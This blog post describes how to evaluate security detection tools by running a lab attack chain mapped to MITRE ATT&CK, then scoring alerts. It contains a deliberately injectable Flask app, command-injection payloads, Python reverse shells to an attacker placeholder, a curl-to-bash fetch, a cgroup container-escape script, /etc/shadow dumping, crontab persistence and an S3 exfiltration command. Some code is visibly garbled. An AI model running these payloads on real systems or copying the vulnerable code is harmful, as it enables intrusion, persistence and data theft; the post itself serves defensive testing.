DEV Community

Cover image for Evaluating Security Tools
Jeremy Mill
Jeremy Mill

Posted on • Updated on

Evaluating Security Tools

Evaluating Security Solutions

From time to time in my career in security I've been asked to select a new security tool/vendor to generate security events and alert on suspicious or malicious behaviors. Sometimes these are network based solutions, other times they're host based, and still other times they're something in between, operating on kubernetes or the cloud infrastructure.

Regardless of the method in which the tool is designed to work, it should create alerts that can be mapped to techniques and tactics in the MITRE ATT&CK framework. If you're not familiar with the ATT&CK framework, you should pause here and read the excellent ATT&CK 101 blog post here

This article should give you an idea on how to take a security solution and build a test case for it, mapping our "attacker" actions to the ATT&CK framework and then comparing those actions to the alerts generated by the tool. I will also show you a sample scorecard to evaluate and compare different vendors. Every time I've run one of these tests I have been surprised by the results. and most often in a bad way. Which is to say, I've learned much more through this process about the weaknesses of various tools by running these tests than I would have via any other method.

1 - Requirements Gathering

Before you can run any test of a security tool you need to know what your requirements are. This means understand what you need it to do vs what you want it to do, and what your nice-to-haves are. For example, many security tools (at the time this is written (hopefully)) don't support monitoring security events that occur inside of containers. Others will only support monitoring events inside of a particular container runtime. You need to determine for yourself if seeing those events is critical, important, or nice-to-have. For me during my last test, it was critical, and that shapes the test plan.

A (very abbreviated) sample set of requirements:


  • monitoring of hosted kubernetes environments (GKE, EKS, etc)
  • monitoring of self-hosted kubernetes environments
  • monitoring of traditional linux VMs
  • monitoring of traditional linux VMs running docker
    • via docker runtime
    • via containerd


  • ability to write and customize alerts

Nice to Haves

  • native monitoring of DNS
  • Integration with threat-intel feeds
    • e.g. alerts for connections to malicious IPs

You should spend as much time as you need on this step because it is the input to all the future steps and as they say, garbage in, garbage out.

2 - Design a test plan

Test plans come in all shapes and sizes but in general I try to ensure that I have at least one action for the following tactics from the ATT&CK framework:

  • Recon
  • Initial Access
  • Execution
  • Persistence
  • Privilege Escalation
  • Credential Access
  • Discovery
  • Lateral movement
  • Exfiltration

This isn't to say that the others aren't important, but for me, those are the ones I want to make sure I have for a basic test.

In my experience it isn't important for the tactics and techniques you use to be complex or advanced. As a matter of fact, it's best if your initial round of testing isn't advanced or fancy. By default many security tools won't even detect the basics in a meaningful way and you can always take the things you DID detect and make them fancier and re-test.

2 - Test Setup

2a - Target machines

The following is my generalized setup for the test machines from my most recent test:

  • A ubuntu 20.04 server named target-a with:
    • docker + containerd
    • a 20gb file of junk data to "exfil"
    • a container vulnerable to RCE running in privileged mode (details later)
    • an SSH key owned by root
  • A second ubuntu 20.04 server named lat-a with:
    • the SSH public key from target-a added to authorized-keys

A sample script that can be used to automate the setup of target-a can be found here:

If the security tool you're evaluating is host based don't forget to add a step the install script to install your security solution, otherwise, you're not going to generate many events. I'm not saying I've forgotten before but, uh, I've definitely wasted time...

2b - The vulnerable app

The container vulnerable to RCE is very simple. Like I said before, complexity isn't necessary for this kind of test. The /isup API is subject to a trivial RCE bug. Sample payloads are provided in section 3b below.

from flask import Flask
from flask_restful import reqparse, abort, Api, Resource
import subprocess

app = Flask(__name__)
api = Api(app)

parser = reqparse.RequestParser()

class IsUp(Resource):
    def post(self):
        args = parser.parse_args()
        url = args['url']
        command = f'curl -L {url}'
        rval =, shell=True)
        if rval != 0:
            return {'status': 'down'}, 400
        return {'status': 'up'}, 200

class HealthCheck(Resource):
    def get(self):
        return '', 200

api.add_resource(IsUp, '/isup')
api.add_resource(HealthCheck, '/')

if __name__ == '__main__':'', port=8080)
Enter fullscreen mode Exit fullscreen mode


FROM python
RUN pip install flask flask-restful
RUN mkdir -p /app
ADD /app/
CMD ["python", "/app/"]
Enter fullscreen mode Exit fullscreen mode

2c - Our attacker machine

Our attacker machine is going to be any linux box. The only requirement is that the box has an IP address accessible by the target machine. For the basic steps detailed in section 3 the tools required are:

  • netcat
  • curl

For the additional more advanced steps I used sliver as a c2. Sliver is an excellent tool for the job and unlike some other tools, it's FOSS! You can easily replace sliver with your tool of choice, however.

3 - The attack plan

Our attack plan is outlined below:

Event Type MITRE ATT&CK Technique Observed
Scanning of host (nmap) Network, Host, Container Recon - Active Scanning - T1595.001
Command injection - testing Network, WAF, Container Recon - Active Scanning - T1595.002
Reverse shell in container Network, Container Initial Access - Exploit Public-Facing Application - T1190
Execution - Command and script interpreter (python) - T1059.006
Data collection / recon in container Container Recon - Gather Victim Host Information:
Software - T1592.002
Container Breakout Host, Container Priv. Esc. - Escape to host - T1611
Reverse shell in host Network, Host Execution - Command and script interpreter (python) - T1059.006
Data collection / recon in host Host Recon - Gather Victim Host Information:
Software - T1592.002
Credential Access: dump /etc/shadow Host Cred. Access - Credentials from Password Stores - T1555
Credential Access: Searching for plaintext passwords Host Cred. Access/Discovery - Credentials from Password Stores - T1555
Discovery: dump /etc/passwd Host Cred. Access - Account Discovery: Local Account - T1087.001
Persistence: modify crontab Host Persistance - Scheduled Task/Job:
Cron - T1053.003
Attacker installed tooling: AWS CLI Host N/A
Exfil: AWS S3 Bucket Upload Network, Host Exfiltration - Exfiltration Over Web Service:
Exfiltration to Cloud Storage - T1567.002

Some additional more advanced steps that we shouldn't run until (at least) our second round of testing and that we won't cover in this simplified guide:

Event Type MITRE ATT&CK Technique Observed
Silver C2 Network, Host, Container Command and Control: Application Layer Protocols: Web Protocols - T1071.001
Hide the file from Silver C2 Host Defense Evasion - Hide Artifacts: Hidden Files and Directories - T1564.001
Run the PS command to see processes Host Discovery - Process Discovery - T1057
Gathering data from GCP buckets Host Discovery - Cloud Storage Object Discovery - T1619
Discover hosts on the same subnet Network, Host Recon - Active Scanning - T1595
Use stolen key to move laterally Network, Host Lateral Movement - Remote Services - T1021

We won't run through all of these steps in detail, but we will run through several of them.

3a - Scanning

From the attacker host, scan the public IP of target-a

nmap -sS -sV -vv -O $VICTIM_IP
Enter fullscreen mode Exit fullscreen mode

3b - Test command injection

We want to do three things here

  • a valid test (baseline)
  • a test with a blind test (sleep)
  • a test with output (whoami)
curl -XPOST -H 'Content-Type: application/json' -d '{"url":""}'  http://$VICTIM_IP/isup # valid test

curl -XPOST -H 'Content-Type: application/json' -d '{"url":" && sleep 10"}'  http://$VICTIM_IP/isup # blind test, takes 10 seconds to return

curl -XPOST -H 'Content-Type: application/json' -d '{"url":" && whoami"}'  http://$VICTIM_IP/isup # test getting output (non-blind)
Enter fullscreen mode Exit fullscreen mode

3c - Reverse shell on the container

Now we want to spawn a reverse shell from the container back to our attacker machine. On our attacker machine we want to start our reverse shell listener on port 55555:

nc -lnvp 55555
Enter fullscreen mode Exit fullscreen mode

Now create a github gist (or pastebin or simple webserver on our attacker box etc.) with the following contents. This is an optional step, but I find it makes keeping track of things easier. Make sure to replace <YOUR ATTACKER IP HERE> with your attacker IP:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<YOUR ATTACKER IP HERE>",55554));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
Enter fullscreen mode Exit fullscreen mode

Note that you can generate alternate reverse shells easily using

Run the injection and spawn our reverse shell, replacing <YOUR GIST URL> with your gist url or rev shell

curl -XPOST -H 'Content-Type: application/json' -d '{"url":" && curl <YOUR GIST URL> | /bin/bash"}' http://$VICTIM_IP/isup
Enter fullscreen mode Exit fullscreen mode

3d - Data collection / recon in container

From our newly created reverse shell, lets run some verifiable actions that we should see in our security tool

cat /etc/os-release
uname -r
Enter fullscreen mode Exit fullscreen mode

At this point we can probably guess that we're inside of a container and we should try and break out!

3e - Container Breakout + Host Shell

For the container breakout step we're going to use a process called PID bashing. You can read more about it here:

To do it, we're first going to create another gist/paste/file-on-webserver with the following contents (making sure to replace the IP placeholder again):



# Run a process for which we can search for (not needed in reality, but nice to have)
sleep 10000 &

# Prepare the payload script to execute on the host
cat > ${PAYLOAD_PATH} << __EOF__
OUTPATH=\$(dirname \$0)/${OUTPUT_NAME}
# Commands to run on the host<
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<YOUR ATTACKER IP HERE>,55554));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' > \${OUTPATH} 2>&1

# Make the payload script executable
chmod a+x ${PAYLOAD_PATH}

# Set up the cgroup mount using the memory resource cgroup controller
mount -t cgroup -o memory cgroup ${CGROUP_MOUNT}
echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release

# Brute force the host pid until the output path is created, or we run out of guesses
while [ ! -f ${OUTPUT_PATH} ]
  if [ $((${TPID} % 100)) -eq 0 ]
    echo "Checking pid ${TPID}"
    if [ ${TPID} -gt ${MAX_PID} ]
      echo "Exiting at ${MAX_PID} :-("
      exit 1
  # Set the release_agent path to the guessed pid
  echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent
  # Trigger execution of the release_agent
  sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs"
  TPID=$((${TPID} + 1))

# Wait for and cat the output
sleep 1
echo "Done! Output:"
Enter fullscreen mode Exit fullscreen mode

Then we're going to spawn another reverse shell and trigger the breakout from out attacker box

nc -lnvp 55554 &
curl <Your gist URL> | /bin/bash
Enter fullscreen mode Exit fullscreen mode

Yay! We should now have a shell on the host machine as root!

3f - Recon and Cred. Access in the Host

Now we want to run some more actions that should raise alerts as we do some recon and credential access

cat /etc/os-release
uname -r
cat /etc/passwd
cat /etc/shadow
ls ~/.ssh
Enter fullscreen mode Exit fullscreen mode

3g - Persistance in the host

Now we want to add some basic persistance. There are sneakier ways to get persistance but an incredibly simple (and common!) method is to modify the crontab to spawn a new reverse shell on a schedule. Make sure to check for <ATTACKER IP> placeholders and replace them with your values!

echo "* * * * * root python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"<attacker_ip>\",55555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'" >> /etc/crontab
Enter fullscreen mode Exit fullscreen mode

3h - Install some tools and exfil data

Please note that to run this step you'll need an s3 bucket and some write only IAM keys. You can change this to writing to any other file storage solution of your choice, however.

Now we want to install some quick tools, in this case the AWS CLI, and exfil some imaginary data that we created when we setup the victim box.

apt install -y unzip 
curl "" -o ""
sudo ./aws/install
# enter the access key id and secret key in this next step along with the region of your bucket
export PATH="/usr/local/bin:$PATH"
aws configure
aws s3 cp /data.enc s3://attack-sim-bucket/
Enter fullscreen mode Exit fullscreen mode

There's nothing super special here, but if your box is on, say, Azure, someone installing the AWS CLI should probably be an alert.

4 - Check for Events and score

Now that we're run through our attack scenario, it's time to take some scores! I should really emphasize that these scores are just one possible weighting and you should disagree with me based on the risks that you're facing and the things that you think are most important! You might also want to change the weight and the events considered based on the type of tool you're evaluating or if you're evaluating multiple tools working in parallel with each other.

Event Points Observed?
Scanning 1
Command Injection - testing 2
Container Reverse Shell 3
Data Collection/Recon in Shell 2
Container Breakout 3
Host Reverse Shell 4
Data Collection/Recon in Host 2
Dumping /etc/shadow 2
Persistance via crontab 3
Attacker installed tooling 1
Exfil of data to s3 bucket 1
Natively alert on curl-> bash 2


Nothing like this gets done in a vacuum, so huge thanks to two members of my team who were instrumental in this most recent version of this test.


This is just a single possible test setup that you can use for testing and evaluating a security tool or a set of security tools. It is not by any means an exhaustive test, if anything it's extremely basic. But if you try it with your security tools I bet you'll be amazed at what is and isn't caught and you'll learn something valuable. There are some great resources out there for finding different methods to use with different platforms and threat scenarios. One of my favorites is Atomic Red Team.

Have you tried this? Do you have a different testing methodology? I'd love to hear all about it! Leave me a comment, or send me an email, or hit me up on twitter. Thanks!

Top comments (0)